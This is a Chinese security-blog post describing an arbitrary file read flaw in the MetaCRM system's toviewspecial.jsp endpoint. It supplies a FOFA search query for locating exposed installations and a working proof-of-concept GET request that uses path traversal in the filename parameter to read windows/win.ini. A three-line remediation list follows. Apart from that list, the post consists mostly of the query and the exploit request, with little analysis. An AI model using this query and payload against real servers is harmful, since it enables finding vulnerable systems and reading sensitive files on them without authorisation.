MetaCRM美特crm系统toviewspecial.jsp任意文件读取漏洞

MetaCRM美特crm系统toviewspecial.jsp任意文件读取漏洞

0228

漏洞信息

项目 内容
漏洞名称 MetaCRM美特crm系统toviewspecial.jsp接口任意文件读取漏洞
漏洞类型 任意文件读取
影响组件 toviewspecial.jsp
影响版本 MetaCRM美特crm

漏洞概述

MetaCRM美特crm系统toviewspecial.jsp接口存在任意文件读取漏洞,攻击者可通过构造恶意请求读取服务器敏感文件。

fofa查询语句

body="/common/scripts/basic.js" && body="www.metacrm.com.cn"

漏洞复现

POC

GET /toviewspecial.jsp?filename=../../../../../../../../../../windows/win.ini HTTP/1.1
Host: target.com

漏洞特征

  • 路径:/toviewspecial.jsp
  • 参数:filename
  • HTTP方法:GET

修复建议

  1. 打补丁
  2. 严格限制文件路径访问
  3. 增加权限控制
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞复现
# 漏洞复现
喜欢就支持一下吧
点赞8 分享
admin的头像-吾要学习
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞-吾要学习
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
9小时前 50
东胜物流软件GetData接口SQL注入漏洞-吾要学习
东胜物流软件GetData接口SQL注入漏洞
东胜物流软件GetData接口SQL注入漏洞
9小时前 48
青龙面板dependencies接口远程代码执行漏洞-吾要学习
青龙面板dependencies接口远程代码执行漏洞
青龙面板dependencies接口远程代码执行漏洞
9小时前 44
安科瑞企业微电网能效管理系统 默认密码漏洞-吾要学习
安科瑞企业微电网能效管理系统 默认密码漏洞
安科瑞企业微电网能效管理系统 默认密码漏洞
8小时前 38
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析-吾要学习
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
12小时前 34
Chroma DB swagger 敏感信息泄露漏洞-吾要学习
Chroma DB swagger 敏感信息泄露漏洞
Chroma DB swagger 敏感信息泄露漏洞
8小时前 30
相关推荐
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞-吾要学习
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
天地伟业Easy7 loadAllUserBeans敏感信息泄露漏洞
9小时前 50
东胜物流软件GetData接口SQL注入漏洞-吾要学习
东胜物流软件GetData接口SQL注入漏洞
东胜物流软件GetData接口SQL注入漏洞
9小时前 48
青龙面板dependencies接口远程代码执行漏洞-吾要学习
青龙面板dependencies接口远程代码执行漏洞
青龙面板dependencies接口远程代码执行漏洞
9小时前 44
安科瑞企业微电网能效管理系统 默认密码漏洞-吾要学习
安科瑞企业微电网能效管理系统 默认密码漏洞
安科瑞企业微电网能效管理系统 默认密码漏洞
8小时前 38
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析-吾要学习
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
深科特LEANMES系统 WarehouseCheck.ashx SQL注入漏洞分析
12小时前 34
Chroma DB swagger 敏感信息泄露漏洞-吾要学习
Chroma DB swagger 敏感信息泄露漏洞
Chroma DB swagger 敏感信息泄露漏洞
8小时前 30
评论 抢沙发

请登录后发表评论

    暂无评论内容